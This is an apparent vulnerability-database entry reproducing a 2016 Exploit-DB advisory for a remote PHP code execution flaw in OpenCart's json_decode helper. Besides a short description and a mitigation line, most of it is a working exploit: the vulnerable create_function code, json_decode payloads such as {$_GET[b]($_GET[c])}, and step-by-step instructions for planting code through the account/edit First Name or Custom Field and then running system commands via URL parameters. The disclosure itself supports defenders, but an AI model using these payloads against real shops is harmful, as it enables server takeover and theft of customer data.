OpenCart json_decode function Remote PHP Code Execution

vendor:

OpenCart

by:

Naser Farhadi

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: OpenCart

Affected Version From: 2.1.0.2

Affected Version To: 2.2.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:opencart:opencart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

OpenCart json_decode function Remote PHP Code Execution

OpenCart json_decode function is vulnerable to Remote Code Execution. An attacker can inject malicious code in the First Name field of the account/edit page or in the Custom Field value of the account/edit or account/register page. When an admin user visits the administration panel, the injected code will be executed.

Mitigation:

Install the latest version of OpenCart and install PHP JSON extension.

Source

Exploit-DB raw data:

OpenCart json_decode function Remote PHP Code Execution

Author: Naser Farhadi
Twitter: @naserfarhadi

Date: 9 April 2016 Version: 2.1.0.2 to 2.2.0.0 (Latest version)
Vendor Homepage: http://www.opencart.com/

Vulnerability:
------------
/upload/system/helper/json.php
$match = '/".*?(?<!\\\\)"/';
$string = preg_replace($match, '', $json);
$string = preg_replace('/[,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]/', '', $string);
...
$function = @create_function('', "return {$json};"); /**** The Root of All Evil ****/
$return = ($function) ? $function() : null;
...
return $return;

Exploit(json_decode):
------------
var_dump(json_decode('{"ok":"{$_GET[b]($_GET[c])}"}'));
var_dump(json_decode('{"ok":"$_SERVER[HTTP_USER_AGENT]"}'));
var_dump(json_decode('{"ok":"1"."2"."3"}'));

Real World Exploit(OpenCart /index.php?route=account/edit)
------------
go to http://host/shop_directory/index.php?route=account/edit
fill $_SERVER[HTTP_USER_AGENT] as First Name
/** save it two times **/
Code execution happens when an admin user visits the administration panel, in this example 
admin user sees his user agent as your First Name in Recent Activity :D

Another example(OpenCart account/edit or account/register custom_field): /** Best Case **/
------------
if admin adds a Custom Field from /admin/index.php?route=customer/custom_field for custom
user information like extra phone number,... you can directly execute your injected code.
go to http://host/shop_directory/index.php?route=account/edit
fill {$_GET[b]($_GET[c])} as Custom Field value
save it
go to http://host/shop_directory/index.php?route=account/edit&b=system&c=ls /** Mission Accomplished **/

Note:
------------
Exploit only works if PHP JSON extension is not installed.

Video: https://youtu.be/1Ai09IQK4C0